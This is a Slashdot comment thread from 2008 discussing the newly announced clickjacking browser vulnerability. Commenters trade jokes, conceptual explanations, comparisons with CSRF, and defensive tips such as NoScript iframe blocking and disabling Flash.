Sweet, I'm already patched

[mmalove]

"In the meantime, the only fix is to disable browser scripting and plugins. We realize this doesn't give people much technical detail to go on, but it's the best we can do right now. "

What's one malicious/annoying script from another? I turned them all off, years ago, and magically problems with trojans, annoying popups, and flashy/dodgy adverts all went away.

At work, I put CNN on my restricted sites list to explicitly prohibit the site from running scripts. I'll take my biased news without the long page loads to pay your sponsors, thanks.

Glad to hear that I patched out this zero day exploit well over 700 days ago.

NoScript fixes it!

[Thaelon]

From a comment on TFA:

NoScript in its default configuration can defeat most of the possible attack scenarios (i.e. the most practical, effective and dangerous): see this comment by Jeremiah himself: http://ha.ckers.org/blog/20080915/clickjacking/#comment-84820. ...

Errata

[Spy+der+Mann]

After reading AKAImBatman's comment, I realized it's not a DOM/scripting vulnerability, but just the ability to hide a link behind flash or an animated GIF content.

Kudos to AKAImBatman for understanding what this was about - and Kudos to the hackers for both discovering such an ingenious exploit and for working with the companies to fix it.

Flashbock?

[Stanistani]

Is that a crisp, clean Adobe lager with a nice finish?

Re:There is nothing to see here....

I have JavaScript disabled. Does that still count as being Rickrolled?

Disabling CSS

[jDeepbeep]

AFAIK the only way to disable CSS is to use obsolete browses like lynx.

I may be wrong here but in FF doesn't View >> Page style >> No style disable CSS? IANAWD

Re:Disabling CSS

[zobier]

You are correct.

I currently use NoScript, CookieSafe, RefControl and Adblock; now I want a CSS preference extension. Maybe I should create a rolled-up extension "NoNothing" which administers preferences for Script, Cookies, Referrer and CSS on a site-by-site basis.

Emergency Transfer Of Funds Required

[jeff_schiller]

I recommend immediately that $700B be transferred to the browser companies to fix this problem. Furthermore, we must transfer this money by end of the week with no strings attached.

That's not Lynx!

That's Google's first browser :-)

http://googlesystem.blogspot.com/2006/03/google-browser.html

Any Microsoft internet 'features' not exploitable?

[guruevi]

iFrames, ActiveX, Browser-as-a-desktop, external-facing daemons for internal systems... anything that isn't buggy that comes from them?

Use object tags and use HTML or XHTML Strict people and it won't happen to you.

Doesn't that make you wish for...

[houbou]

the days when the internet was "stateless" and CGI's where in C? :)

Re:Doesn't that make you wish for...

[jDeepbeep]

the days when the internet was "stateless" and CGI's where in C? :)

HTTP isn't a stateless protocol anymore? When did this happen?

Re:Doesn't that make you wish for...

[Heembo]

HTTP isn't a stateless protocol anymore? When did this happen?

Someone stole my cookies! Give me back my cookies!

Re:Bullshit? Not b.s. -IFrames & Plugins + JSc

"I don't think this exploit really exists. A cross browser cross platform exploit that doesn't use javascript?
Won't be losing any sleep over this one." - by sakdoctor (1087155) on Thursday September 25, @04:26PM (#25156779) Homepage

Well... IFrames, &/or Plugins (specifically Adobe Flash is my guess here) are what you need to worry about!

(Though, supposedly from what I have been reading? Turning off javascript does NOT hurt, & does actually help (despite the last line of the init. post here)).

Here is about as "close to the truth" as you'll get, due to "responsible disclosure" (rather than FULL disclosure... so, go to the guys that 'discovered it'):

http://jeremiahgrossman.blogspot.com/2008/09/cancelled-clickjacking-owasp-appsec.html

APK

P.S.=> I've been telling folks to 'crank those off' (plugins &/or IFrames, as well as javascript (if you do NOT absolutely NEED IT, for proper page functionality (such as on online banking &/or shopping sites))), here, for more than a year now:

HOW TO SECURE Windows 2000/XP/Server 2003 & even VISTA, plus, make it "fun-to-do", via CIS Tool Guidance (& beyond):

http://www.tcmagazine.com/forums/index.php?s=67b2240128d853305689dd2c383066e8&showtopic=2662&st=0&start=0#

apk

Again the same problem

[owlstead]

From the first time they were invented there was some people with outspoken criticism on frames. Frames have been one of the worst security problems of the web from the start. Now we will see more and more exploits that take advantage of having content from multiple websites. And I'm not even talking about the privacy problems with frames and other cross site content.

The best and maybe only solution is not to allow multiple servers to deliver content to the same page. If multiple servers are really needed, one could think of only allowing one host (i.e. www.host.com) and hosts ending with the same name (i.e. images1.www.host.com).

As long as we keep seeing cross site content, it will be a nightmare to manage the security, especially since the functionality of the browsers will keep increasing (and therefore the number of attack vectors).

Re:Bullshit? IFrames + Plugins & Javascript (A

Well... IFrames, &/or Plugins (specifically Adobe Flash is my guess here) ARE what you need to worry about!

(Though, supposedly from what I have been reading? Turning off javascript does NOT hurt, & does actually help (despite the last line of the init. post here)).

Here is about as "close to the truth" as you'll get, due to "responsible disclosure" (rather than FULL disclosure... so, go to the guys that 'discovered it'):

http://jeremiahgrossman.blogspot.com/2008/09/cancelled-clickjacking-owasp-appsec.html

(Just "2nd'ing your motion", to go to the "horses mouth")...

APK

P.S.=> I've been telling folks to 'crank those off' (plugins &/or IFrames, as well as javascript (if you do NOT absolutely NEED IT, for proper page functionality (such as on online banking &/or shopping sites))), here, for more than a year now:

HOW TO SECURE Windows 2000/XP/Server 2003 & even VISTA, plus, make it "fun-to-do", via CIS Tool Guidance (& beyond):

http://www.tcmagazine.com/forums/index.php?s=67b2240128d853305689dd2c383066e8&showtopic=2662&st=0&start=0#

apk

Re:Hurray for us W3M users!

Except for blind people that rely on the (absence of any) layout in lynx, lynx has been superseded by w3m. Tables, frames, Unicode, and imagedisplay when $DISPLAY is available. (And no, don't suggest elinks because it can't do the latter two.)

HEY I JUST TRIED IT!

[A+Wise+Guy]

I tried the link and I'm not affected. really! I have no plugins!

re: you are fucked

[AgentPhunk]

This is slashdot. People here aren't supposed to know what that means..

How does this differ from CSRF?

[merreborn]

Obviously, there's one key difference: in CSRF, the malicious activity is POSTed from a remote page. In a "clickjacking" attack, the malicious activity is POSTed actually using your own page (embedded in a remote page).

Other than that, it's largely the same basic idea -- you trick someone into submitting an action to a remote site using their pre-existing credentials.

The question is, is it possible to employ any well known CSRF prevention techniques to "clickjacking"?

Perhaps I'm over-simplifying here...

[gravyface]

But could you not have a plugin/filter that would look for IFRAME src strings that != *.currentdomain.com? I'm sure there's more of a pattern or signature here that could be parsed/matched (i.e. whatever the offending CSS would be and if it applies to said IFRAME element).

Certainly there's legitimate uses for hidden IFRAMES that point to other domains -- and I'm grossly generalizing here in my example -- but if we can accept heuristic analysis as the de facto standard for telling us whether our email is spam or not, surely there's enough incriminating evidence available to create an effective rule against exploits such as Clickjacking?

Contradiction?

[jibjibjib]

"... javascript is not required to exploit this."

"The exploit requires DHTML."

I thought DHTML was, by definition, the use of Javascript to manipulate the HTML of a web page. So, how can something require DHTML, but not Javascript?

Yet another reason...

[arotenbe]

... not to RTFA.

Re:Hurray for us W3M users!

[Qzukk]

it can't do the latter two.

Unicode, maybe. But images? Click on "Google" alt text on www.google.com in debian's elinks (0.11.1) and you get

What would you like to do with the file 'logo.gif' (type: image/gif)?

Its default option is pulled from /etc/mailcap and friends (debian, with imagemagick installed: image/gif; display 'gif:%s'; test=test -n "$DISPLAY")

Web Dev Guy

iFrames are evil!
All they are used for is Adverts & Hackers.

I block iFrames in Opera 8)

How to ban them simple the next update of all Browsers would disable them where the could not be turned back on! This would force the Web Dev Guys like to fix your site ;)

While I'm at it Google is SpyWare they use iFrames also!

Details here...

[t0y]

Unfortunatelly, I'm a mere mortal.. :(

https://bugzilla.mozilla.org/show_bug.cgi?id=457011

Slashdot bought by Fox News?

[GoodNicksAreTaken]

I'd worry about this but I've locked my self in the closet in order to be safe from killer bees and I can't be arsed.

What an extremely bad article

[tsa]

I RTFA, and the only things I learned are that:

1. It's very bad;

2. They can 'make me click anywhere on the page'

3. It's very bad.

Clickjacking

Java script and vbscript are easy enough to deal with... Why not uninstall/disable flash... It is a neat technology but rarely used in a productive manner. Before ya start flaming me, do a rough count of all the ads, innocuous videos, poorly designed games and websites, and any other useless/nefarious/wasteful implementation you can think of... Compare that to, say, the number of all helpful, intelligent, productive, and generally useful/fun implementations you can think of. As for me the math is relatively easy.

Iframes?

[sk89q]

So little detail! :( Iframes is what I suspect what it is: http://sk89q.therisenrealm.com/2008/09/clickjacking/

If you're still pondering.

iframes?

iframes? who needs that anyway.

What exactly is the danger?

[myxiplx]

Ok, forgive my ignorance, but what exactly is the problem here? It sounds like they can redirect my click, getting my browser to visit another page. Apart from being a slight nuisance, how is that going to cause a problem?

Surely it's only going to be an issue if you are also vulnerable to something else that allows the target site to install malicious software on your machine, and people being vulnerable to stuff like that isn't exactly news.

I mean, if I've already locked down javascript, plugins, active scripting, etc in IE (or just noscript in Firefox), surely the absolute worst this can do is redirect me to a site that try as it might, still can't infect my pc?

The summary and article sound like the sky is falling, but unless I've misunderstood, I don't even think I need to react to this. Sure, it'll be mildly irritating if I visit an affected site, but I'm already protected from anything worse.

So far it's getting a "-1 Meh" from me.

Isn't that rather old?

[hweimer]

This seems very clunky and hacky, but I suspect that the speakers at the OWASP talk have gotten this technique to work well enough so that it is both transparent and highly effective. Can you think of a website that needs you to click, say, a play button in order to view content? That click may be hijacked through an invisible iframe to execute an action on another website.

So, how is this essentially different from CVE-2004-0762, fixed in Firefox four years ago? Okay, they might have found new attack scenarios, but the technique seems to be rather old.

Re:Isn't that rather old?

[Ambush+Commander]

If you read the CVE advisory carefully, the vulnerability is a faulty access policy for allowing extension installation by web-based JavaScript.

Yes, the technique is old, in that it's been around since iframes and CSS have been around, but we haven't really seen it in malware websites; most attackers use less sophisticated but still effective methods.

Myspace

[andersen_hc]

People... they are talking about Myspace. Apparently most modern browsers are vulnerable to Myspace.

Re: OffByOne

[TaoPhoenix]

Sorry,

I checked this and everything looks really ugly.

Can we get an OffByTwo browser that can sneak past the exploit but not look quite so awful?

Re: spooky playground was some CSS delusion

[TaoPhoenix]

Ender's Game FTW!

Re: Might try that...

[TaoPhoenix]

No.

It causes you to perform actions on the football player's girlfriend you didn't think you were performing!

Re: Homestarrunner!

[TaoPhoenix]

SB: Clicking on the Icky Sticky Clicky Wiki's...

SB: "Dear StrongBad. This website says that if I click on a link I could get my browser taken over!! What do I do? P.S. I want the Tire."

SB: Easy IWTT. Click Here to open a nice juicy SubPrime Mortage on that tire. https://www.wamu.com/personal/default.asp

SB: Gotcha! That's Washington Mutual! They got hosed so The Government said, "You have no chance to survive make your time." JP Morgan stepped in and said "All Your Mortgage Are Belong To Us."

Re: "It's Not Scary"?!

[TaoPhoenix]

Mod Parent Troll.

You're handed a juicy exploit that gives you nice little clicks and can't think of a way to break it?!

Here is the Least severe example I can think of. You click to look up something at work and it sends P0rn to HR.

Re: Give me my cookies!

[TaoPhoenix]

Carnegie Hall "milk and cookies" Show:

In an April 1979 performance at New York's Carnegie Hall, ...

The performance is most famous for Kaufman ending the show by actually taking the entire audience, in 20 buses, out for milk and cookies.

http://en.wikipedia.org/wiki/Andy_Kaufman

Now... do you trust me to give you an honest link?

NoScript blocks them

[elfguy]

No need, NoScript blocks most of these attacks, according to a follow up post.

Re: Might try that...

[hesiod]

Actually, you thought it was his girlfriend... but it was actually him.

A NoScript Option Fixes this Vulnerabilty

[Ginger+Unicorn]

in TFA it says Noscript doesnt stop the problem 100% - but there is a link to a page that says that only applies in noscript's default setup. You can get it to stop this problem completely.

http://blogs.zdnet.com/security/?p=1973

noscript -> options -> plugins -> forbid IFRAME.

should be helpful till someone comes up with a proper solution.

patch?

[An+anonymous+Frank]

how about something that disables (i)frames?

is this really that big a deal?

[semirandom]

So a malicious website can get you to click on a link or button of another website. Could someone explain to me how this could be used to do anything other than inconvenience the user - "ha ha loser, you thought you were clicking on that free porn button but i just made you click on the Delete All Email button". As for a solution, couldn't users install something like Stylish (https://addons.mozilla.org/en-US/firefox/addon/2108) and add a rule to put a bright red border around all IFRAMEs?

Re: "It's Not Scary"?!

[pyrr]

Actually, more like you click on something at work, you come across an unsavory site, it tries to load pr0n popups on you, the corporate web-nanny blocks them all, you get called into HR to explain the situation. The only thing is, this sort of web-cruft has been around a while. This is just a way to make it happen through real external-site clicks rather than just launching popups. A nuisance, but not a particularly scary exploit. Maybe it just takes a lot to scare me-- I'd be worried if it could perform actions on pages it brought up, but if all it does is make me follow links it wants me to visit, the worst case scenario is that I'm going to close the browser and never go to the site again...

Re: Performing Actions on a site

[TaoPhoenix]

That's just the problem - it can.

"Follow a link" can go to *anything* including custom loaded pages which then do actions...

Would bringing an FBI Raid upon your head be scary enough?

Re:Bullshit? Not b.s. -IFrames & Plugins + JSc

Looks like I was correct in my "guess" here, in the post I did here two weeks ago (where I indicated stopping plugins, specifically ADOBE FLASH PLAYER):

http://secunia.com/advisories/32163/

SALIENT QUOTE:

"A vulnerability has been reported in Adobe Flash Player, which can be exploited by malicious people to bypass certain security restrictions and disclose potentially sensitive information. The vulnerability is caused due to a design error and can be exploited to e.g. gain access to the system's camera and microphone by tricking the user into clicking Flash Player access control dialogs disguised as normal graphical elements. The vulnerability is reported in version 9.0.124.0. Other versions may also be affected. [b]Solution: The vendor recommends disabling Flash Player camera and microphone interactions[/b]"

----

It also appears that I was also correct in my "guess" here, in the post I did here two weeks ago, about stopping JavaScript also (despite the init. newspost here saying "javascript is not part of it" etc. et al):

http://www.securityfocus.com/news/11534/2

SALIENT QUOTE:

"JavaScript increases the effectiveness of this attacks hugely, because it ensures that user will click our target no matter where he points -- that is, we can move the target around to stay always under the mouse pointer,"

APK

I was correct, per SecurityFocus.com & Secunia

Looks like I was correct in my "guess" here, in the post I did here two weeks ago (where I indicated stopping plugins, specifically ADOBE FLASH PLAYER), which was the reply I just replied to in THIS followup posting:

http://secunia.com/advisories/32163/

SALIENT QUOTE:

"A vulnerability has been reported in Adobe Flash Player, which can be exploited by malicious people to bypass certain security restrictions and disclose potentially sensitive information. The vulnerability is caused due to a design error and can be exploited to e.g. gain access to the system's camera and microphone by tricking the user into clicking Flash Player access control dialogs disguised as normal graphical elements. The vulnerability is reported in version 9.0.124.0. Other versions may also be affected. Solution: The vendor recommends disabling Flash Player camera and microphone interactions"

----

It also appears that I was also correct in my "guess" here, in the post I did here two weeks ago, about stopping JavaScript also (despite the init. newspost here saying "javascript is not part of it" etc. et al):

http://www.securityfocus.com/news/11534/2

SALIENT QUOTE:

"JavaScript increases the effectiveness of this attacks hugely, because it ensures that user will click our target no matter where he points -- that is, we can move the target around to stay always under the mouse pointer,"

APK

P.S.=> I've been telling folks to 'crank those off' (plugins &/or IFrames, as well as javascript (if you do NOT absolutely NEED IT, for proper page functionality (such as on online banking &/or shopping sites))), here, for more than a year now:

HOW TO SECURE Windows 2000/XP/Server 2003 & even VISTA, plus, make it "fun-to-do", via CIS Tool Guidance (& beyond):

http://www.tcmagazine.com/forums/index.php?s=67b2240128d853305689dd2c383066e8&showtopic=2662&st=0&start=0#

AND, as you can see? IT JUST WORKS (even vs. the "latest/greatest" security threats/hacks/vulnerabilities: Common-sense usually does work)... apk

I was correct, per SecurityFocus.com & Secunia

Looks like I was correct in my "guess" here, in the post I did here two weeks ago (where I indicated stopping plugins, specifically ADOBE FLASH PLAYER), which was the reply I just replied to in THIS followup posting:

http://secunia.com/advisories/32163/

SALIENT QUOTE:

"A vulnerability has been reported in Adobe Flash Player, which can be exploited by malicious people to bypass certain security restrictions and disclose potentially sensitive information. The vulnerability is caused due to a design error and can be exploited to e.g. gain access to the system's camera and microphone by tricking the user into clicking Flash Player access control dialogs disguised as normal graphical elements. The vulnerability is reported in version 9.0.124.0. Other versions may also be affected. Solution: The vendor recommends disabling Flash Player camera and microphone interactions"

----

It also appears that I was also correct in my "guess" here, in the post I did here two weeks ago, about stopping JavaScript also (despite the init. newspost here saying "javascript is not part of it" etc. et al):

http://www.securityfocus.com/news/11534/2

SALIENT QUOTE:

"JavaScript increases the effectiveness of this attacks hugely, because it ensures that user will click our target no matter where he points -- that is, we can move the target around to stay always under the mouse pointer"

(A note to the news submitters here & the editors: Learn about this stuff, before stating things that are outright incorrect (such as the init. newspost stating turning off javascript would not help vs. this new threat... without understanding this stuff thoroughly, first? You'll end up eating your words...)

APK

P.S.=> I've been telling folks to 'crank those off' (plugins &/or IFrames, as well as javascript (if you do NOT absolutely NEED IT, for proper page functionality (such as on online banking &/or shopping sites))), here, for more than a year now:

HOW TO SECURE Windows 2000/XP/Server 2003 & even VISTA, plus, make it "fun-to-do", via CIS Tool Guidance (& beyond):

http://www.tcmagazine.com/forums/index.php?s=67b2240128d853305689dd2c383066e8&showtopic=2662&st=0&start=0#

AND, as you can see? IT JUST WORKS (even vs. the "latest/greatest" security threats/hacks/vulnerabilities? Common-sense usually does work)... apk